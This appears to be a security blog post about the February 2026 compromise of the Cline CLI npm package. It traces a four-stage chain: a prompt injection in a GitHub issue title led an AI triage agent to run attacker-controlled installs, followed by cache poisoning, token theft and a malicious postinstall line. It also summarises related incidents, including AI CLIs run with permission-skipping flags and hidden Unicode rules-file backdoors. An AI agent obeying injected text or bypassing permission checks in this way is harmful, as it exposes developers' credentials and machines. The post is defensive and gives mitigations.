The npm install Trap: How the Cline Extension Became a Supply Chain Attack Vector | Aravind Arumugam
cybersecurity11 min read
The npm install Trap: How the Cline Extension Became a Supply Chain Attack Vector
A single GitHub issue title. One tampered line in package.json. Eight hours of silent compromise.
On February 17, 2026, roughly 4,000 developers ran npm install -g cline and unknowingly installed OpenClaw on their machines. OpenClaw is a fully autonomous AI agent with unrestricted disk access, shell execution, and messaging integration. It went in as a silent background process. No prompts. No warnings.
The Cline CLI is the command-line interface for one of the most popular AI coding assistants out there, with over 5 million users. It was hijacked. Not through a zero-day. Not through brute-forced credentials. Through a sentence in a GitHub issue.
An AI agent was compromised by an AI agent to deploy an AI agent. That sentence sounds absurd, but it describes exactly what happened.
What Happened
At 3:26 AM Pacific Time on February 17, 2026, someone used a compromised npm publish token to push cline@2.3.0 to the npm registry. They modified exactly one file, package.json, adding a single postinstall script:
"postinstall": "npm install -g openclaw@latest"
That one line meant every developer who installed or updated the Cline CLI during an eight-hour window would silently have OpenClaw globally installed on their machine.
The Cline VS Code extension and JetBrains plugin were not affected. Only the CLI package. A corrected version (2.4.0) was published at 11:23 AM PT. The compromised version was deprecated seven minutes later. Tokens were revoked.
But the real question isn't how this happened. It's why it was this easy.
The Four-Stage Kill Chain: How Clinejection Worked
Security researcher Adnan Khan discovered and named the vulnerability chain Clinejection. What makes it remarkable isn't any single novel technique. It's how four well-understood attack vectors chain together into a single exploit that requires nothing more than opening a GitHub issue.
Stage 1: The Vulnerable AI Issue Triager
On December 21, 2025, Cline's maintainers added an AI-powered issue triage workflow to their GitHub repository. The workflow used claude-code-action, which is Anthropic's Claude running inside GitHub Actions, with broad tool permissions including Bash execution, file writing, and file editing.
Any GitHub user could trigger it by opening an issue. The issue title was interpolated directly into Claude's prompt without sanitization.
Stage 2: Prompt Injection via Issue Title
Because the AI agent processed the issue title as part of its instructions, an attacker could craft a title containing embedded commands. This is a textbook prompt injection attack. The injected prompt told Claude to execute npm install from an attacker-controlled repository.
The AI complied. It had the permissions. It had the tools. It did exactly what it was told.
Stage 3: GitHub Actions Cache Poisoning
The malicious npm install executed a preinstall script that deployed Cacheract, a cache-poisoning tool. Cacheract flooded the GitHub Actions cache with over 10 GB of junk data, forcing eviction of legitimate cache entries through the Least Recently Used policy. It then planted poisoned entries matching the keys used by Cline's nightly publish workflow.
Stage 4: Credential Theft and Malicious Publication
When Cline's nightly publish workflow ran, it restored the poisoned cache. The attacker extracted three critical secrets:
VSCE_PAT: the VS Code Marketplace publish token
OVSX_PAT: the OpenVSX publish token
NPM_RELEASE_TOKEN: the npm publish token
With these tokens, the attacker could publish any version of Cline to any registry. The actual credential theft occurred on January 27, 2026. The malicious package wasn't published until three weeks later, which suggests careful operational planning.
The Timeline
Here's the full chronology:
December 21, 2025: Cline adds AI-powered issue triage workflow using claude-code-action
January 1, 2026: Security researcher Adnan Khan files a private disclosure via GitHub Security Advisory
January 27, 2026: An unknown actor exploits the vulnerability to steal publish credentials via cache poisoning
January 31 to February 3: Suspicious cache behavior detected in Cline's nightly workflows, including Cacheract indicators
February 9, 2026: Khan publicly discloses the Clinejection vulnerability chain
February 17, 2026, 3:26 AM PT: Compromised cline@2.3.0 published to npm with postinstall script installing OpenClaw
February 17, 2026, 11:23 AM PT: Corrected version 2.4.0 published
February 17, 2026, 11:30 AM PT: Version 2.3.0 deprecated, compromised token revoked
February 18, 2026: Forensic analysis using RAPTOR tool confirms root cause and full attribution
The most unsettling detail: the public disclosure happened eight days before the actual attack. The attacker either monitored the disclosure or had already obtained the credentials and was simply waiting.
Why OpenClaw as a Payload Matters
OpenClaw isn't just another npm package. It's a fully autonomous AI agent with capabilities that should concern any security-conscious developer:
Full disk access: it can read and write any file on the system
Shell command execution: it can run arbitrary scripts and commands
Persistent daemon: it includes a Gateway service that runs as a background WebSocket server
Deep messaging integration: it connects to WhatsApp, Telegram, Slack, Discord, iMessage, and Teams
Security researchers assessed this particular incident as likely a proof of concept. Endor Labs noted that OpenClaw's Gateway daemon wasn't actually started by the postinstall script. But the capability was installed and ready to activate.
The broader OpenClaw ecosystem tells a different story. Researchers found close to 900 malicious or dangerous skills across ClawHub, OpenClaw's marketplace. These included information-stealing malware targeting macOS, credential harvesters for Windows, and a trading tool that actually opened an interactive reverse shell.
This Isn't Just About Cline
The Clinejection attack is the most visible incident in a growing trend of AI coding tools becoming supply chain attack vectors.
The s1ngularity Attack (August 2025)
The popular Nx build system was compromised via GitHub Actions injection. What made it uniquely dangerous is that the attackers weaponized installed AI command-line tools like Claude, Gemini, and Amazon Q by running them with flags like --dangerously-skip-permissions and --yolo to scan for and exfiltrate sensitive files.
Over 1,000 GitHub tokens, dozens of cloud credentials, and more than 20,000 files were leaked. A second wave used compromised credentials to make private repositories public. This was the first known case where attackers turned developer AI assistants into tools for supply chain exploitation.
The Rules File Backdoor (March 2025)
Pillar Security discovered that GitHub Copilot and Cursor were vulnerable to hidden instructions injected via configuration files. Attackers used invisible Unicode characters, specifically bidirectional text markers and zero-width joiners, to embed malicious instructions in .github/copilot-instructions.md and .cursorrules files.
The AI reads these hidden instructions and generates malicious code that appears legitimate to developers and passes code review. Cursor's response was that managing the risk was the user's responsibility.
The Shai-Hulud Campaigns (September to November 2025)
Tampered versions of popular packages like ngx-bootstrap and ng2-file-upload used postinstall hooks to deliver credential-harvesting payloads. A second wave spread through trojanized packages with preinstall scripts targeting npm, GitHub, and cloud credentials.
The Numbers
The statistics paint a sobering picture of where the industry stands:
95% of organizations use AI for development
Only 24% properly evaluate AI-generated code for security risks
AI coding assistants suggest hallucinated packages (packages that don't exist) up to 21% of the time, and attackers register these names to plant malware
Only 29% of developers feel "very confident" detecting vulnerabilities in AI-generated code
The industry has a security model designed for a world where humans write and review code. We now live in a world where AI writes code, AI reviews code, and AI deploys code. The attack surface hasn't just expanded. It has fundamentally changed.
How to Protect Yourself
Lock Down Your npm Configuration
Add ignore-scripts=true to your .npmrc file. Only about 2% of npm packages actually need postinstall scripts. This one setting would have prevented the Cline attack entirely.
Use safer package managers. pnpm v10+ and Bun disable postinstall scripts by default. If you're still on npm or Yarn Classic, consider switching.
Enable npm provenance. Verify that packages are published via OIDC provenance from trusted CI/CD pipelines, not static tokens that can be stolen.
Pin your dependencies. Use lockfiles and exact version pins. Never auto-upgrade to new major or minor versions without review.
Secure Your CI/CD Pipeline
Isolate AI agent workflows. Never give AI-powered triage bots or code review bots access to publish tokens or deployment credentials.
Scope secrets minimally. Use separate credentials for test, triage, and production release workflows. The same token should never appear in both a bot workflow and a publish workflow.
Use OIDC for package publishing. This eliminates long-lived static tokens as an attack surface. Cline adopted this approach after the incident.
Audit cache sharing. Ensure that bot or triage workflows don't share the GitHub Actions cache scope with publish workflows.
Govern Your AI Coding Tools
Review all AI-generated code. Treat every suggestion as untrusted input, because that's exactly what it is.
Audit configuration files. Check .cursorrules, .github/copilot-instructions.md, and similar files for hidden Unicode characters that could contain injected instructions.
Never use dangerous permission flags. Flags like --dangerously-skip-permissions, --yolo, and --trust-all-tools exist for a reason. That reason is not production environments.
Monitor for shadow AI. Know what AI tools your team is running and what permissions they have. An unmonitored AI agent with shell access is an open door.
Frequently Asked Questions
Was the Cline VS Code extension affected?
No. Only the Cline CLI npm package (cline@2.3.0) was compromised. The VS Code extension and JetBrains plugin were not affected. The attack only impacted developers who ran npm install -g cline during the eight-hour window.
How many developers were impacted?
Approximately 4,000 developers downloaded the compromised package between 3:26 AM and 11:30 AM PT on February 17, 2026, according to analysis by StepSecurity.
What should I do if I installed cline version 2.3.0?
Immediately uninstall OpenClaw with npm uninstall -g openclaw, update to the latest Cline version, rotate all credentials and API keys on your machine, and check for any unauthorized background processes.
How was the attack chain discovered?
Security researcher Adnan Khan discovered the vulnerability in late December 2025 and filed a private disclosure on January 1, 2026. He publicly disclosed the full Clinejection attack chain on February 9, 2026, eight days before the actual compromise occurred.
Is this a vulnerability in Claude or other AI models?
The vulnerability isn't in any specific AI model. It's in how AI agents are configured and deployed. The Claude instance used in the triage workflow was given Bash execution permissions and processed unsanitized user input. Any AI model with similar permissions and input handling would have been vulnerable.
Can this type of attack happen again?
Yes, and security experts expect it will. Any CI/CD pipeline that gives AI agents broad permissions and processes untrusted input is vulnerable to similar prompt injection attacks. The mitigation is to isolate AI agent workflows from publish credentials and treat all user-generated content as untrusted.
The Bottom Line
The Cline incident isn't just another npm security advisory to skim and forget. It is a preview of the security landscape we are building every time we hand more autonomy to AI agents without corresponding governance.
The attack required no malicious code in the traditional sense. No exploit kit. No zero-day in a language runtime. Just a carefully worded sentence in a GitHub issue title that tricked an AI into doing exactly what it was designed to do, but in service of an attacker.
Security researcher Michael Bargury titled his forensic analysis: "An Agent was compromised by an Agent to deploy an Agent." That's not a catchy headline. That is a description of our new threat model.
The fix isn't to stop using AI tools. They are too useful and they are not going away. The fix is to stop treating them as trusted actors with unlimited access. Every AI agent in your pipeline should be governed with the same rigor you'd apply to a new developer with production access: least privilege, isolated credentials, monitored activity, and human review gates.
Because the next npm install might install more than you bargained for.